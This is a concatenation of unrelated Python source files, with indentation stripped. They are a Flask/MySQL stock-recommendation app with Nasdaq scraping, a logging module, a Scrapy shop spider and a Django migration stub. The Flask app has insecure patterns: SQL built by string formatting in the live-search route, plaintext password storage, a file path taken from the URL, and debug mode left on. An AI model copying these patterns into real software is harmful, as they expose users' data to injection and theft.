from sqlalchemy import create_engine
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import plotly.express as px
import csv
app=Flask(__name__)
app.secret_key = 'your secret key'
@app.route('/', methods=['GET', 'POST'])
def login():
# Output message if something goes wrong...
msg = ''
# Check if "username" and "password" POST requests exist (user submitted form)
if request.method == 'POST' and 'username' in request.form and 'password' in request.form:
# Create variables for easy access
username = request.form['username']
password = request.form['password']
# Check if account exists using MySQL
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute('SELECT * FROM usuario WHERE nick_name_usuario = %s AND password_usuario = %s', (username, password,))
# Fetch one record and return result
account = cur.fetchone()
# If account exists in accounts table in out database
if account:
# Create session data, we can access this data in other routes
session['loggedin'] = True
session['id'] = int (account['id_usuario'])
session['username'] = account['nick_name_usuario']
# Redirect to home page
return redirect(url_for('home'))
else:
# Account doesnt exist or username/password incorrect
msg = 'Incorrect username/password!'
# Show the login form with message (if any)
return render_template('index.html', msg=msg)
@app.route('/requestCompany',methods=['GET','POST'])
def requestCompany():
return render_template('nasdaq_petition/index.html')
@app.route('/logout')
def logout():
# Remove session data, this will log the user out
session.pop('loggedin', None)
session.pop('id', None)
session.pop('username', None)
# Redirect to login page
return redirect(url_for('login'))
@app.route('/register', methods=['GET', 'POST'])
def register():
# Output message if something goes wrong...
msg = ''
# Check if "username", "password" and "email" POST requests exist (user submitted form)
if request.method == 'POST' and 'username' in request.form and 'password' in request.form and 'email' in request.form \
and 'nick_name' in request.form:
# Create variables for easy access
username = request.form['username']
password = request.form['password']
email = request.form['email']
nick_name = request.form['nick_name']
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute('SELECT * FROM usuario WHERE nick_name_usuario = %s', (nick_name,))
account = cur.fetchone()
#If account exists show error and validation checks
if account:
msg = 'Account already exists!'
elif not re.match(r'[^@]+@[^@]+\.[^@]+', email):
msg = 'Invalid email address!'
elif not re.match(r'[A-Za-z0-9]+', username):
msg = 'Username must contain only characters and numbers!'
elif not username or not password or not email:
msg = 'Please fill out the form!'
else:
# Account doesnt exists and the form data is valid, now insert new account into accounts table
cur.execute('INSERT INTO usuario VALUES (NULL, %s,%s, %s, %s,NULL,%s,%s)', (username,nick_name,email, password,'<PASSWORD>',1))
db.commit()
msg = 'You have successfully registered!'
return render_template('register.html', msg=msg)
@app.route('/profile')
def profile():
# Check if user is loggedin
if 'loggedin' in session:
# We need all the account info for the user so we can display it on the profile page
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute('SELECT * FROM usuario WHERE id_usuario = %s', (session['id'],))
account = cur.fetchone()
# Show the profile page with account info
return render_template('profile.html', account=account)
# User is not loggedin redirect to login page
return redirect(url_for('login'))
@app.route('/data')
def data():
# Check if user is loggedin
if 'loggedin' in session:
# We need all the account info for the user so we can display it on the profile page
db = getMysqlConnection()
cur = db.cursor()
cur.execute('SELECT * FROM usuario')
accounts = cur.fetchall()
db.commit()
# Show the profile page with account info
return render_template('data.html', accounts=accounts)
# User is not loggedin redirect to login page
@app.route('/company2')
def company2(id=None):
if id != None:
sql = "SELECT * from empresa where id_empresa = %s";
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute(sql, (id,))
company = cur.fetchone()
return render_template("company2.html",company=company)
@app.route('/graph')
def graph():
img = io.BytesIO()
y = [1,2,3,4,5]
x = [0,2,1,3,4]
plt.plot(x,y)
plt.savefig(img, format='png')
img.seek(0)
plot_url = base64.b64encode(img.getvalue())
return render_template('graph2.html', plot_url=plot_url)
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
@app.route("/nn")
def train():
trainPredictDataSet("./downloads/HistoricalData_1638570426278.csv","INTC")
return ""
def byContent():
db_connection_str = 'mysql+pymysql://sistemasderecomendacion:<EMAIL>&<EMAIL>/sr'
db_connection = create_engine(db_connection_str)
df = pd.read_sql('SELECT nombre_empresa, sector, industry FROM empresa', con=db_connection)
#df.drop(['id_empresa','sigla_empresa','name_file','estado_empresa','exchange','dividen_pay','dividen_date',"market_cap"], axis=1, inplace=True)
df=df.replace({'\\$':''}, regex=True)
df=df.replace({'\\%':''}, regex=True)
df=df.replace({'N/A':''}, regex=True)
columnsString=["nombre_empresa","sector","industry"]
df[columnsString]=df[columnsString].astype("string")
"""columnsToArray=["today","h_week","share_volume","average_volume"]
for column in columnsToArray:
if(column=="today" or column=="h_week"):
separator="/"
else:
separator=","
df[column] = df[column].apply(lambda x: x.split(separator) if x != '' else [])
s = df.apply(lambda x: pd.Series(x[column]),axis=1).stack().reset_index(level=1, drop=True)
s.name = column+"_clean"
df = df.drop(column, axis=1).join(s)
columnsString=["nombre_empresa","sector","industry"]
df[columnsString]=df[columnsString].astype("string")
def processCol(col):
return col.astype(str).apply(lambda val: val.replace(',','') if val != '' else 0).astype(float)
num_columns = df.select_dtypes(exclude='string').columns
df[num_columns]=df[num_columns].apply(processCol)"""
vectorizer = TfidfVectorizer(min_df=1, stop_words='english')
bag_of_words= vectorizer.fit_transform(df["sector"]+" "+df["industry"])
cosine_sim = linear_kernel(bag_of_words, bag_of_words)
indices = pd.Series(df.index, index=df['nombre_empresa']).drop_duplicates()
def content_recommender(top, title, cosine_sim=cosine_sim, df=df, indices=indices):
idx = indices[title]
sim_scores = list(enumerate(cosine_sim[idx]))
sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)
sim_scores = sim_scores[1:top+1]
movie_indices = [i[0] for i in sim_scores]
return df['nombre_empresa'].iloc[movie_indices]
sql= "SELECT nombre_empresa FROM acciones a, empresa e where a.id_empresa=e.id_empresa and a.id_usuario =%s group by nombre_empresa"
db = getMysqlConnection()
cur = db.cursor()
cur.execute(sql,(session["id"],))
companies_of_user = [item[0] for item in cur.fetchall()]
aux=0
response=np.array([])
for company in companies_of_user:
if aux==2:
break
x=content_recommender(5,company).to_numpy()
response=np.concatenate((response, x))
++aux
return response
def byFilter():
db = getMysqlConnection()
cur = db.cursor()
sql= "SELECT id_usuario FROM usuario"
cur.execute(sql)
users = cur.fetchall()
sql= "SELECT id_empresa, nombre_empresa FROM empresa"
cur.execute(sql)
companies = cur.fetchall()
d={}
l=[]
aux=0
for user in users:
d[user[0]]=[]
for company in companies:
sql= "SELECT count(*) FROM acciones where id_empresa = %s and id_usuario = %s"
cur.execute(sql,(company[0],user[0]))
count = cur.fetchone()
d[user[0]].append(count[0])
if aux==0:
l.append(company[1])
aux=1
df = pd.DataFrame(d, index =l)
df_corr=df.corr(method='pearson')
def vecinosCercanos(corrUser, k=5):
return corrUser[corrUser.index != corrUser.name].nlargest(n=k).index.tolist()
vecinos = df_corr.apply(lambda col: vecinosCercanos(col))
def calculateRecomendationUser(vecinosCercanos, usercorr, data):
def calculatePredictCompany(vecinosCercanos,usercorr,buyCompany):
haveBuy = ~np.isnan(buyCompany)
if(np.sum(haveBuy) != 0):
return np.dot(buyCompany.loc[haveBuy], usercorr.loc[haveBuy])/np.sum(usercorr[haveBuy])
else:
return np.nan
return df.apply(lambda row: calculatePredictCompany(vecinosCercanos, usercorr, row[vecinosCercanos]), axis=1)
predictCompany = df.apply(lambda buys: calculateRecomendationUser(vecinos[buys.name],df_corr[buys.name][vecinos[buys.name]],df))
predict=predictCompany[session["id"]].sort_values(ascending=False).head(5)
predict.to_csv("./al.csv")
ap=pd.read_csv("./al.csv")
ar=ap.iloc[:,0].to_numpy()
db.commit()
return ar
def hybrid():
content=byContent()
filter= byFilter()
db = getMysqlConnection()
cur = db.cursor()
sql= "SELECT nombre_empresa FROM acciones a, empresa e where a.id_empresa=e.id_empresa and a.id_usuario =%s group by nombre_empresa"
cur.execute(sql,(session["id"],))
companies_of_user = [item[0] for item in cur.fetchall()]
b = np.array(companies_of_user)
ar = np.intersect1d(content, filter)
c = ar[~np.in1d(ar,b)]
db.commit()
return c
@app.route("/getCompany/<int:id>")
def getCompany(id=None):
if id != None:
sql = "SELECT * from empresa where id_empresa = %s";
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
cur.execute(sql, (id,))
company = cur.fetchone()
predictions= predict(company['name_file'],company['sigla_empresa'])
return render_template("company2.html",company=company, predictions=predictions)
@app.route("/saveBuy",methods=["POST"])
def saveBuy():
id_c=request.form['id_company']
now = datetime.now()
# dd/mm/YY H:M:S
fecha = now.strftime("%Y-%m-%d %H:%M:%S")
conn = getMysqlConnection()
cur = conn.cursor()
sql = 'INSERT INTO acciones (id_empresa,id_usuario,fecha_adquisicion,estado_accion) VALUES (%s,%s,%s,%s)'
val = (id_c,session["id"],fecha,"comprada")
cur.execute(sql, val)
conn.commit()
return ""
def getMysqlConnection():
return mysql.connector.connect(host='sistemasderecomendacion.mysql.database.azure.com',
database='sr',
user='sistemasderecomendacion',
password='<PASSWORD>',)
@app.route('/getMySQL')
def index(): # put application's code here
db = getMysqlConnection()
sqlstr = "select * from usuario"
cur = db.cursor()
cur.execute(sqlstr)
empleados = cur.fetchall()
return render_template('empresas/index.html',empleados=empleados)
@app.route('/destroy/<int:id>')
def destroy(id):
conn = getMysqlConnection()
cur = conn.cursor()
cur.execute("DELETE FROM usuario where id=%s",(id))
conn.commit()
return redirect('/')
@app.route('/edit/<int:id>')
def edit(id):
conn = getMysqlConnection()
cur = conn.cursor()
cur.execute("SELECT * FROM usuario where id=%s",(id))
usuarios = cur.fetchall()
conn.commit()
return redirect('/edit.html',usuarios=usuarios)
@app.route('/create')
def create(): # put application's code here
return render_template('empresas/create.html')
@app.route('/store',methods=['POST'])
def storage():
_nombre=request.form['txtNombre']
_apellido=request.form['txtApellido']
_correo=request.form['txtCorreo']
_numero=request.form['txtNumero']
sql = "INSERT INTO `persona`(`id`,`nombre`,`apellido`,`email`,`telefono`) VALUES (3,%s,%s,%s,%s);"
datos=(_nombre,_apellido,_correo,_numero)
conn = getMysqlConnection()
cursor = conn.cursor()
cursor.execute(sql)
conn.commit()
return render_template('empresas/index.html')
@app.route('/search',methods=['POST'])
def search():
_company_name=request.form['company_name']
_company_name = _company_name.replace(" ","%20")
link = "https://www.nasdaq.com/search?q="+_company_name+"&page=1&sort_by=relevence&langcode=en"
chrome_options = uc.ChromeOptions()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--disable-popup-blocking")
chrome_options.add_argument("--profile-directory=Default")
chrome_options.add_argument("--ignore-certificate-errors")
chrome_options.add_argument("--disable-plugins-discovery")
chrome_options.add_argument("--incognito")
chrome_options.add_argument("user_agent=DN")
chrome_options.add_argument("--disable-gpu")
driver = uc.Chrome(options=chrome_options)
driver.delete_all_cookies()
driver.get(link)
response_table = driver.find_elements(By.CLASS_NAME,"search-results__text")
links =driver.find_element(By.CLASS_NAME,"search-results__results-items")
getLink = links.get_attribute("innerHTML")
getLinks = getLink.split("</a>")
respuesta=[]
aux=0
for item in response_table:
if aux == 5:
break;
s =item.text.splitlines()
if "Summary" not in s[0]:
break;
link = ""
s[0] = s[0].replace("- Summary","").strip()
s[1] = s[1].split(" ")[0]
for x in getLinks:
k= str(s[1].lower())
c= str(x)
if k in c:
link = find_between(c,'href="','"')
link = "https://www.nasdaq.com" + link
break;
add= [s[0],s[1],link]
if add not in respuesta:
respuesta.append(add)
aux= aux +1
driver.quit()
return render_template('nasdaq_response/index.html',response=respuesta)
@app.route("/selectData",methods=["POST","GET"])
def getData():
empresa = request.form['nombre']
sigla = request.form['sigla']
url = request.form['url']
def getDatas():
chrome_options = uc.ChromeOptions()
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--disable-popup-blocking")
chrome_options.add_argument("--profile-directory=Default")
chrome_options.add_argument("--ignore-certificate-errors")
chrome_options.add_argument("--disable-plugins-discovery")
chrome_options.add_argument("--incognito")
chrome_options.add_argument("user_agent=DN")
chrome_options.add_argument("--disable-gpu")
dir = os.path.dirname(__file__)
filename = os.path.join(dir, 'downloads')
prefs = {}
prefs["profile.default_content_settings.popups"]=0
prefs["download.default_directory"]=filename
chrome_options.add_experimental_option("prefs", prefs)
driver = uc.Chrome(options=chrome_options)
driver.maximize_window()
driver.delete_all_cookies()
driver.get(url)
element = driver.find_element(By.CLASS_NAME,'summary-data__header')
element.location_once_scrolled_into_view
WebDriverWait(driver,10)
time.sleep(10);
titles = driver.find_elements(By.CLASS_NAME,"summary-data__cellheading")
titles2 = driver.find_elements(By.CLASS_NAME,"summary-data__cell")
data_company = []
for x in range(len(titles)):
data_company.append([titles[x].text,titles2[x].text])
driver.get(url+"/historical")
time.sleep(5)
driver.execute_script("scroll(0, 200);")
dates= driver.find_elements(By.CLASS_NAME,"table-tabs__tab")
for y in dates:
if y.get_attribute("data-value") == 'y10':
y.click();
break;
WebDriverWait(driver,5)
time.sleep(5)
try:
driver.find_element(By.XPATH,"/html/body/div[1]/div/main/div[2]/div[4]/div[3]/div/div[1]/div/div[1]/div[3]/button").click()
except NoSuchElementException:
try:
driver.find_element(By.XPATH,"/html/body/div[2]/div/main/div[2]/div[4]/div[3]/div/div[1]/div/div[1]/div[3]/button").click()
except NoSuchElementException:
pass
time.sleep(4);
driver.quit()
list_of_files = glob.glob(filename+"\*") # * means all if need specific format then *.csv
latest_file = max(list_of_files, key=os.path.getctime)#save id,empresa, sigla, latest_file
exchange = data_company[0][1]
sector = data_company [1][1]
industry = data_company [2][1]
year = data_company[3][1]
today = data_company[4][1]
share = data_company[5][1]
average = data_company[6][1]
previous = data_company[7][1]
week = data_company[8][1]
market = data_company[9][1]
ratio = data_company[10][1]
forward = data_company[11][1]
earnings = data_company[12][1]
annualized = data_company[13][1]
dividend = data_company[14][1]
dividendp = data_company[15][1]
current = data_company[16][1]
try:
beta = data_company[17][1]
except:
beta ="N/A"
name_file=latest_file.split("\\")[-1]
conn = getMysqlConnection()
cur = conn.cursor()
sql = 'INSERT INTO empresa (nombre_empresa,sigla_empresa,name_file,exchange,sector,industry,year_target,today,share_volume,average_volume,previous_close,h_week,market_cap,ratio,forward,earnings,annualized_dividend,dividen_date,dividen_pay,current_yield,estado_empresa,beta) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
val = (empresa,sigla,name_file,exchange, sector, industry ,year ,today ,share ,average ,previous ,week ,market,ratio ,forward,earnings,annualized,dividend,dividendp,current,'activo',beta)
cur.execute(sql, val)
conn.commit()
predict(name_file, sigla)
#getTweet(sigla)
#convertToCSV(sigla)
thread= Thread(target=getDatas)
thread.start()
return render_template("nasdaq_response/ok.html")
@app.route('/home',methods=['GET','POST'])
def home():
# Check if user is loggedin
if 'loggedin' in session:
# User is loggedin show them the home page
# We need all the account info for the user so we can display it on the profile page
db = getMysqlConnection()
cur = db.cursor()
cur.execute('SELECT count(*) FROM acciones where id_usuario = %s',(session["id"],))
tiene = cur.fetchone()
db.commit()
if tiene[0] > 0:
recomendados= hybrid()
arr_recomendados = []
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
for r in recomendados:
cur.execute('SELECT * FROM empresa where nombre_empresa = %s',(r,))
data_recomendados = cur.fetchall()
arr_recomendados.append(data_recomendados)
db.commit()
return render_template("home.html", username=session['username'], recomendados=arr_recomendados)
return render_template('home.html', username=session['username'])
# User is not loggedin redirect to login page
return redirect(url_for('login'))
@app.route("/ajaxlivesearch",methods=["POST","GET"])
def ajaxlivesearch():
db = getMysqlConnection()
cur = db.cursor(dictionary=True)
if request.method == 'POST':
try:
search_word = request.form['query']
except:
search_word = ""
if search_word == '':
query = "SELECT * from empresa ORDER BY id_empresa"
cur.execute(query)
empresa = cur.fetchall()
numrows=""
else:
query = "SELECT * from empresa WHERE nombre_empresa LIKE '%{}%'".format(search_word)
cur.execute(query)
empresa = cur.fetchall()
numrows = 0
for e in empresa:
numrows=numrows + 1
return jsonify({'htmlresponse': render_template('response.html', empresa=empresa, numrows=numrows)})
@app.route('/buscador')
def buscador():
return render_template('a.html')
@app.route('/getPlotCSV/<init>') # this is a job for GET, not POST
def plot_csv(init):
df = pd.read_csv('downloads/'+ init , usecols=[0,1], header=0)
df=df.rename(columns={"Close/Last":"Close"})
df=df.replace({'\\$':''}, regex=True)
df.to_csv("./graph.csv",index=False,sep=',')
return send_file("./graph.csv",
mimetype='text/csv',
attachment_filename= "graph.csv",
as_attachment=True)
#@app.route('/getPlotCSV/<init>') # this is a job for GET, not POST
#def plot_csv(init):
# x = []
# y = []
# with open('downloads/'+ init,'r') as csvfile:
# plots = csv.reader(csvfile, delimiter = ',')
# for row in plots:
# x.append(row[0])
# y.append(row[1])
# plt.bar(x, y, color = 'g', width = 0.72, label = "Graph")
#plt.xlabel('Date')
#plt.ylabel('Close')
#plt.title('Graph')
#plt.legend()
#plt.show()
@app.route('/getPlotCSS') # this is a job for GET, not POST
def plot_css():
return send_file('templates/custom.css',
mimetype='text/css',
attachment_filename='custom.css',
as_attachment=True)
@app.route('/getB') # this is a job for GET, not POST
def plot_jpeg():
return send_file('templates/business.jpeg',
mimetype='img/jpeg',
attachment_filename='business.jpeg',
as_attachment=True)
#@app.route("/predictCompany")
def predict(archivo, sigla):
ruta_tweets=sigla+".csv"
ruta_data_accions="downloads/"+archivo
print(ruta_data_accions)
print(ruta_tweets)
sentimientos=analysTweets(ruta_tweets,sigla)
#predict=predictDataSet(ruta_data_accions)
predict=predictDataSet(ruta_data_accions,sigla)
result =[predict,sentimientos]
return result
def trainModel(archivo, sigla):
sigla=sigla+".csv"
ruta_data_accions="/downloads/"+archivo+sigla
train=trainPredictDataSet(ruta_data_accions,sigla)
return render_template("train_model_predict.html",training_data_len= train)
def getTweet(sigla):
import tweet_collector
tweet_collector.setArgs(sigla)
tweet_collector.run()
def convertToCSV(sigla):
csvWriter = csv.writer(open(sigla+'.csv', 'w',newline='',encoding='utf-8'))
conn = sqlite3.connect(sigla+'_2021-11-24-2021-11-25.db')
cursor = conn.cursor()
cursor.execute("SELECT * FROM Tweet")
rows = cursor.fetchall()
for row in rows:
csvWriter.writerow(row)
def insert_bd():
"""if request.method=='POST':
# Handle POST Request here
return render_template('index.html')
sql= "INSERT into autor values (0,'Andres1','Algo1 xd');"
conn=mysql.connect()
cursor=conn.cursor()
cursor.execute(sql)
conn.commit()"""
if __name__ == '__main__':
#DEBUG is SET to TRUE. CHANGE FOR PROD
app.run(port=5000,debug=True)
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
StarcoderdataPython
|
6535810
|
<gh_stars>100-1000
#!/usr/bin/env python
"""
A simple logging module that logs to the console and a logfile, and has a
configurable threshold loglevel for each of console and logfile output.
Use it this way:
import anuga.utilities.log as log
# configure my logging
log.console_logging_level = log.INFO
log.log_logging_level = log.DEBUG
log.log_filename = './my.log'
# log away!
log.debug('A message at DEBUG level')
log.info('Another message, INFO level')
This class uses the 'borg' pattern - there is never more than one instance
of log data. See the URL for the basic idea used here: modules *are*
singletons!
<http://www.suttoncourtenay.org.uk/duncan/accu/pythonpatterns.html>
Until the first call to log() the user is free to play with the module data
to configure the logging.
"""
import os
import sys
import traceback
import logging
import datetime
DefaultConsoleLogLevel = logging.CRITICAL
DefaultFileLogLevel = logging.INFO
TimingDelimiter ='#@# '
################################################################################
# Module variables - only one copy of these, ever.
#
# The console logging level is set to a high level, like CRITICAL. The logfile
# logging is set lower, between DEBUG and CRITICAL. The idea is to log least to
# the console, but ensure that everything that goes to the console *will* also
# appear in the log file. There is code to ensure log <= console levels.
#
# If console logging level is set to CRITICAL+1 then nothing will print on the
# console.
################################################################################
# flag variable to determine if logging set up or not
_setup = False
# logging level for the console
console_logging_level = DefaultConsoleLogLevel
# logging level for the logfile
log_logging_level = DefaultFileLogLevel
# The default name of the file to log to.
log_filename = os.path.join('.', 'anuga.log')
# set module variables so users don't have to do 'import logging'.
CRITICAL = logging.CRITICAL
ERROR = logging.ERROR
WARNING = logging.WARNING
INFO = logging.INFO
DEBUG = logging.DEBUG
NOTSET = logging.NOTSET
# set _new_python to True if python version 2.5 or later
_new_python = (sys.version_info[0]*10 + sys.version_info[1] >= 25) # 2.5.x.x
################################################################################
# Module code.
################################################################################
def log(msg, level=None):
'''Log a message at a particular loglevel.
msg: The message string to log.
level: The logging level to log with (defaults to console level).
The first call to this method (by anybody) initializes logging and
then logs the message. Subsequent calls just log the message.
'''
global _setup, log_logging_level
fname = '' # default to no frame name if it cannot be found
lnum = 0
# have we been setup?
if not _setup:
# sanity check the logging levels, require console >= file
if log_logging_level > console_logging_level:
log_logging_level = console_logging_level
# setup the file logging system
if _new_python:
fmt = '%(asctime)s %(levelname)-8s %(mname)25s:%(lnum)-4d|%(message)s'
else:
fmt = '%(asctime)s %(levelname)-8s|%(message)s'
logging.basicConfig(level=log_logging_level, format=fmt,
filename=log_filename, filemode='w')
# define a console handler which writes to sys.stdout
console = logging.StreamHandler(sys.stdout)
console.setLevel(console_logging_level)
formatter = logging.Formatter('%(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
# catch exceptions
sys.excepthook = log_exception_hook
# tell the world how we are set up
start_msg = ("Logfile is '%s' with logging level of %s, "
"console logging level is %s"
% (log_filename,
logging.getLevelName(log_logging_level),
logging.getLevelName(console_logging_level)))
if _new_python:
logging.log(logging.INFO, start_msg,
extra={'mname': __name__, 'lnum': 0})
else:
logging.log(logging.INFO, start_msg)
# mark module as *setup*
_setup = True
# if logging level not supplied, assume console level
if level is None:
level = console_logging_level
# get caller information - look back for first module != <this module name>
frames = traceback.extract_stack()
frames.reverse()
try:
(_, mod_name) = __name__.rsplit('.', 1)
except ValueError:
mod_name = __name__
for (fpath, lnum, mname, _) in frames:
try:
(fname, _) = os.path.basename(fpath).rsplit('.', 1)
except ValueError:
fname = __name__
if fname != mod_name:
break
# why are we here? ... Oh yes! Log the message!
if _new_python:
logging.log(level, msg, extra={'mname': fname, 'lnum': lnum})
else:
logging.log(level, msg)
def log_exception_hook(type, value, tb):
'''Hook function to process uncaught exceptions.
type: Type of exception.
value: The exception data.
tb: Traceback object.
This has the same interface as sys.excepthook().
'''
msg = '\n' + ''.join(traceback.format_exception(type, value, tb))
critical(msg)
################################################################################
# Shortcut routines to make for simpler user code.
################################################################################
def debug(msg=''):
'''Shortcut for log(DEBUG, msg).'''
log(msg, logging.DEBUG)
def info(msg=''):
'''Shortcut for log(INFO, msg).'''
log(msg, logging.INFO)
def warning(msg=''):
'''Shortcut for log(WARNING, msg).'''
log(msg, logging.WARNING)
def error(msg=''):
'''Shortcut for log(ERROR, msg).'''
log(msg, logging.ERROR)
def critical(msg=''):
'''Shortcut for log(CRITICAL, msg).'''
log(msg, logging.CRITICAL)
def timingInfo(msg=''):
'''Shortcut for log(timingDelimiter, msg).'''
log(TimingDelimiter + msg, logging.INFO)
def resource_usage(level=logging.INFO):
'''Log memory usage at given log level.'''
_scale = {'KB': 1024, 'MB': 1024*1024, 'GB': 1024*1024*1024,
'kB': 1024, 'mB': 1024*1024, 'gB': 1024*1024*1024}
if sys.platform != 'win32':
_proc_status = '/proc/%d/status' % os.getpid()
def _VmB(VmKey):
'''Get number of virtual bytes used.'''
# get pseudo file /proc/<pid>/status
try:
t = open(_proc_status)
v = t.read()
t.close()
except IOError:
return 0.0
# get VmKey line, eg: 'VmRSS: 999 kB\n ...
i = v.index(VmKey)
v = v[i:].split(None, 3)
if len(v) < 3:
return 0.0
# convert Vm value to bytes
return float(v[1]) * _scale[v[2]]
def memory(since=0.0):
'''Get virtual memory usage in bytes.'''
return _VmB('VmSize:') - since
def resident(since=0.0):
'''Get resident memory usage in bytes.'''
return _VmB('VmRSS:') - since
def stacksize(since=0.0):
'''Get stack size in bytes.'''
return _VmB('VmStk:') - since
msg = ('Resource usage: memory=%.1fMB resident=%.1fMB stacksize=%.1fMB'
% ((memory() / _scale['MB']),
(resident() / _scale['MB']),
(stacksize() / _scale['MB'])))
log(msg, level)
else:
# Windows code from: http://code.activestate.com/recipes/511491/
try:
import ctypes
import winreg
except:
log(level, 'Windows resource usage not available')
return
kernel32 = ctypes.windll.kernel32
c_ulong = ctypes.c_ulong
c_ulonglong = ctypes.c_ulonglong
class MEMORYSTATUSEX(ctypes.Structure):
_fields_ = [('dwLength', c_ulong),
('dwMemoryLoad', c_ulong),
('ullTotalPhys', c_ulonglong),
('ullAvailPhys', c_ulonglong),
('ullTotalPageFile', c_ulonglong),
('ullAvailPageFile', c_ulonglong),
('ullTotalVirtual', c_ulonglong),
('ullAvailVirtual', c_ulonglong),
('ullAvailExtendedVirtual', c_ulonglong)
]
memoryStatusEx = MEMORYSTATUSEX()
memoryStatusEx.dwLength = ctypes.sizeof(MEMORYSTATUSEX)
kernel32.GlobalMemoryStatusEx(ctypes.byref(memoryStatusEx))
msg = ('Resource usage: total memory=%.1fMB free memory=%.1fMB'
% ((memoryStatusEx.ullTotalPhys / _scale['MB']),
(memoryStatusEx.ullAvailPhys / _scale['MB'])))
log(msg, level)
def CurrentDateTime():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def TimeStamp():
return datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
def resource_usage_timing(level=logging.INFO, prefix =""):
'''Log memory usage at given log level.'''
_scale = {'KB': 1024, 'MB': 1024*1024, 'GB': 1024*1024*1024,
'kB': 1024, 'mB': 1024*1024, 'gB': 1024*1024*1024}
if sys.platform != 'win32':
_proc_status = '/proc/%d/status' % os.getpid()
def _VmB(VmKey):
'''Get number of virtual bytes used.'''
# get pseudo file /proc/<pid>/status
try:
t = open(_proc_status)
v = t.read()
t.close()
except IOError:
return 0.0
# get VmKey line, eg: 'VmRSS: 999 kB\n ...
i = v.index(VmKey)
v = v[i:].split(None, 3)
if len(v) < 3:
return 0.0
# convert Vm value to bytes
return float(v[1]) * _scale[v[2]]
def memory(since=0.0):
'''Get virtual memory usage in bytes.'''
return _VmB('VmSize:') - since
def resident(since=0.0):
'''Get resident memory usage in bytes.'''
return _VmB('VmRSS:') - since
def stacksize(since=0.0):
'''Get stack size in bytes.'''
return _VmB('VmStk:') - since
msg = ('Resource usage: memory=%.1fMB resident=%.1fMB stacksize=%.1fMB'
% ((memory() / _scale['MB']),
(resident() / _scale['MB']),
(stacksize() / _scale['MB'])))
log(msg, level)
timingInfo('sys_platform, ' + sys.platform)
timingInfo(prefix + 'memory, ' + str((memory() / _scale['MB'])))
timingInfo(prefix + 'resident, ' + str((resident() / _scale['MB'])))
timingInfo(prefix + 'stacksize, ' + str((stacksize() / _scale['MB'])))
else:
# Windows code from: http://code.activestate.com/recipes/511491/
try:
import ctypes
import winreg
except:
log(level, 'Windows resource usage not available')
return
kernel32 = ctypes.windll.kernel32
c_ulong = ctypes.c_ulong
c_ulonglong = ctypes.c_ulonglong
class MEMORYSTATUSEX(ctypes.Structure):
_fields_ = [('dwLength', c_ulong),
('dwMemoryLoad', c_ulong),
('ullTotalPhys', c_ulonglong),
('ullAvailPhys', c_ulonglong),
('ullTotalPageFile', c_ulonglong),
('ullAvailPageFile', c_ulonglong),
('ullTotalVirtual', c_ulonglong),
('ullAvailVirtual', c_ulonglong),
('ullAvailExtendedVirtual', c_ulonglong)
]
memoryStatusEx = MEMORYSTATUSEX()
memoryStatusEx.dwLength = ctypes.sizeof(MEMORYSTATUSEX)
kernel32.GlobalMemoryStatusEx(ctypes.byref(memoryStatusEx))
msg = ('Resource usage: total memory=%.1fMB free memory=%.1fMB'
% ((memoryStatusEx.ullTotalPhys / _scale['MB']),
(memoryStatusEx.ullAvailPhys / _scale['MB'])))
log(msg, level)
timingInfo('sys_platform, ' + sys.platform)
timingInfo(prefix + 'total_memory, ' + str((memoryStatusEx.ullTotalPhys / _scale['MB'])))
timingInfo(prefix + 'free_memory, ' + str((memoryStatusEx.ullAvailPhys / _scale['MB'])))
################################################################################
if __name__ == '__main__':
critical('#' * 80)
warning('Test of logging...')
log('CRITICAL+1', CRITICAL+1)
log('CRITICAL', CRITICAL)
log('CRITICAL-1', CRITICAL-1)
log('CRITICAL-2', CRITICAL-2)
log('default - CRITICAL?')
def test_it(num=100):
if num > 0:
test_it(num-1)
else:
resource_usage()
import numpy as num
a = num.zeros((1000,1000), num.float)
info('sys.version_info=%s, _new_python=%s'
% (str(sys.version_info), str(_new_python)))
test_it()
|
StarcoderdataPython
|
1906767
|
# coding=utf-8
import datetime
import logging
import scrapy
from shop.items import ShopItem
logger = logging.getLogger('mycustomlogger')
class Megadrop24Spider(scrapy.Spider):
name = 'megadrop24.ru'
base_url = 'https://megadrop24.ru'
search = '/search/page%d?query=%s&minprice=1&maxprice=20000&submit='
def __init__(self, *args, **kwargs):
super(Megadrop24Spider, self).__init__(**kwargs)
self.query=kwargs['query']
self.history=kwargs['history']
def start_requests(self):
yield scrapy.Request(url=self.base_url + self.search % (1, self.query), callback=self.get_pages)
def get_pages(self, response):
print("user-agent: %s" % self.settings.get('USER_AGENT'))
count_pages = response.xpath('string(.//*[@class="pagination"]/li[last()])').extract_first()
if count_pages != '':
count_pages = int(count_pages)
else:
count_pages = 0
for page in range(count_pages + 1):
url = self.base_url + self.search % (page, self.query)
yield response.follow(url, callback=self.parse)
def parse(self, response):
for product in response.xpath('//*[@class="product-item"]'):
item = ShopItem()
item['resource'] = self.name
item['history'] = self.history
item["url"] = self.base_url + product.xpath('.//h3/a/@href').extract_first()
item["name"] = product.xpath('.//h3/a/text()').extract_first()
item["price"] = float(product.xpath('.//*[@class="pi-price"]/text()').extract_first())
item['created_date'] = datetime.datetime.now()
yield item
|
StarcoderdataPython
|
150294
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-01-07 00:36
# IMPORTANT: This file was renamed on purpose to keep the same naming as release/python3, TODO: Check conflicts
